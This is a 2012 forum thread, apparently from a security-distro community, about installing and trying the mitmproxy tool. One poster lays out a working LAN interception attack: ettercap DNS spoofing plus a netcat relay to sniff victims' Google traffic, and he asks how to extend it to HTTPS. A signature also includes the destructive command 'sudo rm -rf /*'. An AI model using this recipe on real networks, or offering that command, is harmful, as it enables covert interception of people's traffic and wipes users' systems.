Author Topic: mitm proxy  (Read 5637 times)

weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
on: September 14, 2012, 07:03:26 PM
i know that we have another http proxy, but take a look here
http://mitmproxy.org/index.html

i've found it very cool!

una voce libera è sempre liberatrice
under_r00t


ZEROF

  • Hero Member
  • *****
  • Posts: 1244
    • View Profile
    • Pen Tester
Reply #1 on: September 14, 2012, 08:21:43 PM
Look fine bro, i will try this tool.

INSTALL on BBOx :

$ sudo apt-get install python-pip python-dev build-essential
$ sudo pip install --upgrade pip
$ sudo pip install --upgrade virtualenv
$ sudo pip install mitmproxy

Thanks !
« Last Edit: September 14, 2012, 09:45:38 PM by ZEROF »


Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*


weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
Reply #2 on: September 15, 2012, 12:13:23 AM
yes looks fine!! i'm playing and... works very well!!! =)

see you bro!

una voce libera è sempre liberatrice
under_r00t


joker__

  • Newbie
  • *
  • Posts: 13
    • View Profile
    • piecesofsheets
Reply #3 on: September 17, 2012, 06:41:44 PM
Thank you for sharing, weVeg. In these days I was searching for a proxy for performing a mitm...and I used a pretty simple "bash proxy" as
Code: [Select]
$ nc -l 80 | nc www.google.com Yah, it worked fine...but I was still missing features as on the fly editing...and ssl. I just didn't know of existence of programs like this....I'm here to learn;)
Thank you

joker__

joker__
http://piecesofsheets.wordpress.com/ [soon in english]


weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
Reply #4 on: September 17, 2012, 07:00:28 PM
Thank you for sharing, weVeg. In these days I was searching for a proxy for performing a mitm...and I used a pretty simple "bash proxy" as
Code: [Select]
$ nc -l 80 | nc www.google.com Yah, it worked fine...but I was still missing features as on the fly editing...and ssl. I just didn't know of existence of programs like this....I'm here to learn;)
Thank you

joker__
Hi joker! on bbox we already have this kind of tool, but i've found mitmproxy very useful as well as simply to use!!!
if you try it would be useful some feedback!
Bye!!!!

una voce libera è sempre liberatrice
under_r00t


joker__

  • Newbie
  • *
  • Posts: 13
    • View Profile
    • piecesofsheets
Reply #5 on: September 18, 2012, 12:23:00 PM
Thank you for sharing, weVeg. In these days I was searching for a proxy for performing a mitm...and I used a pretty simple "bash proxy" as
Code: [Select]
$ nc -l 80 | nc www.google.com Yah, it worked fine...but I was still missing features as on the fly editing...and ssl. I just didn't know of existence of programs like this....I'm here to learn;)
Thank you

joker__
Hi joker! on bbox we already have this kind of tool, but i've found mitmproxy very useful as well as simply to use!!!
Which tools, eg? :)
if you try it would be useful some feedback!
Bye!!!!

[maybe OT, @ZEROF. If so, I may create a new topic for my question in the forum.]

Hi weVeg. I spent a bit of time on mitmproxy today. It is pretty intuitive, and very useful.
Actually I was meant to perform an "elegant" dns spoof. Maybe you can tell me how to do it using the application you suggested:

what i'm doing (working)
With ettercap I start a session using dns_spoof plugin, spoofing e.g. www.google.it to a local ip (let's say attacker: 192.168.1.5).
In this way anyone in the LAN who makes requests to google, it actually make requests to my ip.
Now I start a simple proxy that replies to the client (victim) connected, as google would:
Code: [Select]
$ mkfifo backpipe
# nc -l 80 0<backpipe | nc www.google.com 80 1>backpipe
Finally I may sniff all the data, through wireshark or so on...

This attack works pretty well: the victim doesn't realize he's being attacked.

what i'd like to do
The fatal problem is: what about https?
I belived that a software as the one you suggested may do this job for me.
I actually tried, but I didn't manage to.
How would you do it? Let's say: all the trafic to a server (google.com), as my previous example, is being redirected to your pc. How do you make mitmproxy replying all the client requests to google.com, also with https support?

joker__
http://piecesofsheets.wordpress.com/ [soon in english]


weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
Reply #6 on: September 18, 2012, 01:28:31 PM
@joker: sorry i made mistake with zap... i'm confusing!
well, i'm new mitmproxy user too, so i remand you on the doc page [1]


[1] http://mitmproxy.org/doc/index.html

una voce libera è sempre liberatrice
under_r00t


joker__

  • Newbie
  • *
  • Posts: 13
    • View Profile
    • piecesofsheets
Reply #7 on: September 19, 2012, 11:43:32 AM
@joker: sorry i made mistake with zap... i'm confusing!
well, i'm new mitmproxy user too, so i remand you on the doc page [1]


[1] http://mitmproxy.org/doc/index.html

Yep, zap is for finding vulns in web applications;)
Ok, so we'll learn ourselves how to use this tool...it seems cool:)

Bye!

joker__
http://piecesofsheets.wordpress.com/ [soon in english]


weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
Reply #8 on: September 19, 2012, 01:36:49 PM
eh si! sometimes i made mistake with installed or default tools.... un pò di delirio!

una voce libera è sempre liberatrice
under_r00t